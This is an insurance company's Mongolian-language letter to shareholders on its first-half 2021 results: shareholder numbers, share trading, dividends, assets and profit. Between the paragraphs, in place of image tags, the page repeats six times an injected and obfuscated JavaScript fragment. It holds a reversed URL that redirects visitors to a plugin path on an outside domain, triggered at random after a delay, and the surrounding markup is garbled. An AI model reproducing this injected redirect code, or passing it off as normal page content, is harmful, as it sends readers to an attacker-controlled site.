by

Эрхэм хүндэт хувьцаа эзэмшигч, даатгуулагч, харилцагч, хамтран ажиллагсад та бүхнийхээ амар мэндийг эрэн мэндчилье.  

2021 оны эхний хагас жилд Коронавируст цар тахлын халдвар эрчимтэй тархаж, улс орон даяар гамшгаас хамгаалах өндөржүүлсэн бэлэн байдалд ажиллан хатуу хөл хорио тогтоож, бизнесийн үйл ажиллагаа, зах зээл эрс хумигдан, эдийн засгийн нөхцөл байдал хүндэрсэн ч Ард Даатгал ХК-ийн хувьд ололт амжилтаар дүүрэн байж, хөрөнгө оруулагч, хувьцаа эзэмшигчдийнхээ итгэлийг дааж, түүхэн амжилтууд гаргаж чадлаа.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2021-07-24_11-56-23.jpg” alt=”” width=”1280″ height=”720″ />

 

2021 оны 6 сарын 30-ны өдрийн байдлаар компанийн хувьцааг нийт 10,108 иргэн, аж ахуйн нэгж эзэмшиж байна. Оны эхнээс хувьцаа эзэмшигчдийн тоо 8,039-өөр буюу 4 дахин нэмэгдсэн нь хөрөнгө оруулагчид бидэнд өндөр итгэл үзүүлж буйг илтгэж байна.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2021-07-24_11-56-33.jpg” alt=”” width=”1280″ height=”720″ />

Ард Даатгал нь нээлттэй хувьцаат компани болсноос хойш Монголын Хөрөнгийн Биржийн ТОП-20 индексын сагсанд 3 жил дараалан багтсан бөгөөд тайлант улиралд 8.7 сая ширхэг хувьцаа эргэлтэд орж, нийт 10.3 тэрбум төгрөгийн арилжаа хийгдсэн. Харин IPO хийснээс хойш 16.7 сая хувьцаа эргэлтэд орж, нийт 16.2 тэрбум төгрөгийн арилжаа хийгдэн, Монголын Хөрөнгийн Бирж дээрх хамгийн хөрвөх чадвар сайтай хувьцаануудын 1 байсаар байна. Хувьцааны үнийн хувьд тайлант хугацаанд 705-аас 1,800 төгрөгийн хооронд хэлбэлзэж, улирлын эцэст 1,453 төгрөгийн үнэтэй хаагдсанаар компанийн зах зээлийн үнэлгээ 36.3 тэрбум төгрөгт хүрлээ.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2021-07-24_10-26-35.jpg” alt=”” width=”1280″ height=”720″ />

Бид өмнөх 5 жилийн жишгээр ногдол ашиг тараах шийдвэрийг ч мөн гаргав. Ийнхүү нэгж хувьцаанд 40 төгрөг, нийт 1.0 тэрбум төгрөгийг хуваарилахаар шийдвэрлэсний дагуу эхний хагас жилд багтаан хүсэлт илгээсэн хувьцаа эзэмшигч байгууллагуудад холбогдох ногдол ашгийн төлбөрүүдийг олгож эхэлсэн бөгөөд үлдсэн хувьцаа эзэмшигчдийнхээ ногдол ашгийн төлбөрийн гэрээг ҮЦТХТ-тэй байгуулан 2021 оны 7 сарын 2-ны өдөр үнэт цаасны дансаар нь дамжуулан олголоо.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2021-07-24_10-26-36.jpg” alt=”” width=”1280″ height=”720″ />

Тайлант хугацаанд манай компанийн нийт хөрөнгө 34.3 тэрбум төгрөгт хүрч, оны эхнээс даруй 19 хувиар өссөн ба 7.4 тэрбум төгрөгийн хураамжийн орлого төвлөрүүлэн, 2.1 тэрбум төгрөгийн нөхөн төлбөрийг даатгуулагчдад олголоо. Мөн даатгалын компанийн үндсэн орлогоос гадна ашгийг бүрдүүлэхэд нэн чухал үүрэг гүйцэтгэдэг хөрөнгө оруулалтын багц 25.7 тэрбум төгрөгт, хөрөнгө оруулалтын орлого 8.5 тэрбум төгрөгт хүрснээр 6.7 тэрбум төгрөгийн цэвэр ашигтай ажиллалаа.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2021-07-24_10-26-36-2.jpg” alt=”” width=”1280″ height=”720″ />

Бид даатгалын үйлчилгээгээ бүрэн цахимжуулах, CRM, ERP системийг сайжруулах, бүрэн цахимжсан үйлчилгээг иргэдэд үзүүлэх зэрэг ажлуудыг төлөвлөн хэрэгжүүлж байна. 

Өнөөгийн тааварлашгүй цаг үеийг бид цаашид амжилттай даван туулж, өмнөө тавьсан зорилгодоо 2021 оны эцэс гэхэд хүрч, хувьцаа эзэмшигчдийнхээ хөрөнгийн үнэ цэнийг нэмэгдүүлсэн баяртай мэдээтэй уулзахын өлзийтэй ерөөлийг дэвшүүлье. 

 

Гүнээ хүндэтгэсэн,

Гүйцэтгэх Захирал Г.Цогбадрах

Copyright © 2017 Ard Daatgal